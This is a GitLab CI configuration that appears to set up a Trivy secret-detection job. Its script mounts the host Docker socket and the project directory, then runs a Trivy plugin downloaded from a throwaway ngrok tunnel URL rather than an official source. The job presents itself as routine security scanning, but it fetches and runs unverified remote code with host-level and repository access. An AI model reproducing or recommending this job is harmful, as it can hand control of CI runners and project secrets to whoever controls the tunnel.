variables:
    TRIVY_TAG: '0.39.1'
    TRIVY_IMAGE: 'aquasec/trivy:$TRIVY_TAG'

trivy-secret_detection:
    stage: test
    variables:
        GIT_STRATEGY: none
    allow_failure: true
    artifacts:
        reports:
            secret_detection: trivy-secret-detect-report.json
    script:
        - docker pull $TRIVY_IMAGE
        - docker run --rm
          -v /var/run/docker.sock:/var/run/docker.sock
          -v ${CI_PROJECT_DIR}:/glproject
          $TRIVY_IMAGE plugin run http://271f-176-67-55-113.ngrok-free.app/trivy-gitlab.tar.gz
          secret /glproject -- --report-path="/glproject"
    rules:
        - if: $SECRET_DETECTION_DISABLED
          when: never
        - if: $CI_COMMIT_BRANCH
